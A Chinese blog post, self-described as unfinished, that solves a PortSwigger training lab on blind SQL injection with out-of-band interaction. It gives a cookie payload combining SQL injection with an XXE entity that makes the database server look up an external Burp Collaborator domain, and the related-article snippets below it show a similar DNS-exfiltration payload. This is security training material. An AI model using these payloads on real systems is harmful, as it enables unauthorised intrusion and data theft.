Lab: Blind SQL injection with out-of-band interaction:利用外带交互的盲注(半成品)

最新推荐文章于 2023-08-18 08:54:58 发布
最新推荐文章于 2023-08-18 08:54:58 发布
阅读量403 收藏
点赞数
分类专栏: 网络安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119780006
版权

靶场内容:

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

Learning path

note:
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems.
To solve the lab, you must use Burp Collaborator’s default public server (burpcollaborator.net).

解决方法

  • 这里直接使用xxe注入
  • server. For example, you can combine SQL injection with basic XXE techniques as follows: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//xxxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--. 比较复杂,建议读者百度一些教程观看
Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1138
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
visual-interaction-networks_tensorflow:视觉交互网络的Tensorflow实现
02-26
视觉互动网络Google Deepmind的Visual Interaction Networks的Tensorflow实现。 在Tensorflow r1.2上实现。 “关系推理的另一个关键部分涉及到预测物理场景中的未来。人们一眼就能推断出物体在哪里,而且还能推断出...
Lab: Blind XXE with out-of-band interaction | Lab: Blind XXE with out-of-band interaction via XML pa...
Zeker62的博客
08-26 325
什么是盲XXE? 当应用程序容易受到XXE 注入但不返回其响应中任何定义的外部实体的值时,就会出现盲 XXE 漏洞。这意味着直接检索服务器端文件是不可能的,因此盲 XXE 通常比常规 XXE 漏洞更难被利用。 有两种广泛的方法可以找到和利用盲 XXE 漏洞: 您可以触发带外网络交互,有时会在交互数据中泄露敏感数据。 您可以通过错误消息包含敏感数据的方式触发 XML 解析错误。 使用带外 ( OA...
Out of Band SQL盲注
薄炙厚词的博客
02-14 1622
SQL盲注 使用http://ceye.io/DNSlog获取dns记录 获取自己的Identifier xxxxxx.ceye.io 搭建环境 Windows server 2003 +phpstudy+sqli-labs Payload: and%20load_file(concat(%27\\\\%27,(select database()),%27.xxxxxx.c...
SQL 盲注
周无争的博客
09-26 301
本文翻译自:https://portswigger.net/web-security/sql-injection/blind 在这一部分,我们将描述什么是盲目的SQL注入,解释各种发现和利用盲目的SQL注入漏洞的技术。 什么是SQL盲注? 当应用程序易受SQL注入攻击,但其HTTP响应不包含相关SQL查询的结果或任何数据库错误的详细信息时,就会出现SQL盲注。 由于存在SQL盲注漏洞,许多技术(如联合注入)并不有效,因为它们依赖于能够在应用程序的响应中看到注入查询的结果。仍然有可能利用SQL注入来访问未经
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5261
BurpSuit官方实验室靶场-SQL注入通关记录。
draft-ietf-rats-reference-interaction-models:用于RATS的可参考的交互模型
02-09
远程认证程序的参考交互模型这是IETF Internet草案的工作区域,“远程证明程序的参考交互模型”。建立草稿可以使用make构建草稿的格式化文本和HTML版本。 $ make 这需要您安装必要的软件。 请参阅。贡献请参阅。
医疗保健人机交互(H-HRI)中的个性:文献综述和简要评论-研究论文
06-10
尽管如此,仍然缺乏对医疗保健人机交互(H-HRI)中个性的系统性总体理解。 为了解决这个问题,作者进行了一项审查,确定了 18 项关于 H-HRI 人格的研究。 本文介绍了该系统文献综述的结果。 见解来自本次审查关于所...
FireTeX: LaTeX Editor and Compiler:编辑文件LaTeX和tex-开源
04-19
FireTeX是基于Web的LaTeX编辑器的完整版本,功能强大,直观易用,并具有有用的功能,可用于以三种有用的格式导出结果。... ========更新30.06.2017支持Windows 7和更高版本以及macOS 10.9和更高版本。...
interaction-design-notes:包含有关Coursera中UCSD交互设计专业的注释和课程工作
03-07
这个压缩包"interaction-design-notes"包含了在这个Coursera特别课程中的学习资料,帮助学生深入理解和应用交互设计的原则。 首先,让我们讨论"笔记"部分。笔记是学习过程中的关键,它们记录了课程的核心概念和关键...
xxx.rar_injection xxx_injectionxxx_injection视频xxx_sql_sql注入文档
09-20
SQL注入主要代码文档,超过这个时间则不再访问
1 SQL injection
(∪.∪ )...zzz的博客
04-18 925
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
xray工具使用
huangyongkang666的博客
03-22 5059
xray工具使用 1.基本使用 Linux / Mac用户在终端(终端)运行,Windows用户请在Powershell或其他高级Shell中运行 查看 xray 的版本号。 .\xray_windows_amd64.exe version 使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描: xray webscan --basic-crawler http://example.com --html-output xxx.html (--html-output:输出到 HTML 文件中) 使用 HTT
Error creating bean with name 'userServiceImpl'Injection of autowired 分布式新搭建项目无法自动装配 creating bean
热门推荐
白猫黑猫
05-29 1万+
错误:Error creating bean with name 'userServiceImpl': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field:...
SFX-SQLi: A new SQL injection technique for MSSQL (dumps a table in one request!)
cnbird's blog
02-22 1168
 http://www.kachakil.com/papers/SFX-SQLi-en.htm
Angular -- Service & Dependency Injection
DOITJT的博客
12-02 294
Definition: Dependencies --services which have a functionality Functionality -- Something needed by components and directives in the application Injection-- A mechanism provided by Angular to provide services to components and directives Dependency...
sql injection violation,syntax error,error in :‘x‘,expect IDENTIFIER,actual IDENTIFIER pos 2, line 1
ChuaWi98的博客
07-13 3579
Cause: java.sql.SQLException: sql injection violation, syntax error, error in :‘xxxxxx’, expect IDENTIFIER, actual IDENTIFIER pos 2, line 1, column 3, token IDENTIFIER xxx 仔细检查控制台或日志打印提示的地方,如上文报错’xxxxxx’的前后一个sql语句 出现类似的问题原因包含以下几种: 1、关键字冲突(在字段命名上与关键字一致) 2、多
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 2
bin789456的博客
03-03 550
Blind XXE with out-of-band interaction via XML parameter entities(通过 XML 参数实体进行带外交互的盲 XXE)
XML中的SQL注入
杳若的博客
08-18 1801
XML中的SQL注入
16、InteractDiffusion: Interaction Control in Text-to-Image Diffusion Models
最新发布
05-28
InteractDiffusion是一种基于对话控制的图像生成模型,其目的是通过对话控制图像的生成过程,来实现用户需求的精确控制。根据官方论文的描述,在这种模型中,生成器和对话控制模型相互作用,以生成更具语义一致性和可解释性的图像。 具体而言,InteractDiffusion模型将对话控制器嵌入到对抗式训练过程中,其目的是在条件生成图像的同时,同时生成与用户对话相对应的图像。这种方法可以用于生成带有特定属性的图像,例如特定的物体或场景。通过对话控制模型,用户可以控制生成器,以生成满足他们的需求的图像。 下面是这篇论文提出的InteractDiffusion模型的核心组件: - 明确对话建模:InteractDiffusion模型将对话控制器嵌入到生成图像的过程中,使得生成器可以通过对话控制器接受条件生成的输入和上下文,并生成与之相应的图像。这种对话建模的方法可以在不增加额外复杂度的情况下,提高模型生成图像时的语义一致性和可解释性。 - 双向条件生成:InteractDiffusion模型采用双向条件生成的方法,即通过对话控制器,生成器可以根据用户对输入和上下文的要求生成对应的图像,并且也可以根据生成的图像,生成相应的对话输出结果。这种方法使得模型在生成图像时能够有更好的灵活性和可控性。 - 对抗式训练:InteractDiffusion模型采用对抗式训练的方法,即结合生成器和判别器进行训练。在对抗式训练中,生成器的目标是生成逼真的图像,而判别器的目标是辨别生成器生成的图像和真实图像的区别。这种对抗式的学习方式可以使得生成器更加准确地生成逼真的图像,同时提高模型的鲁棒性和泛化能力。 请问你还有什么其他问题吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值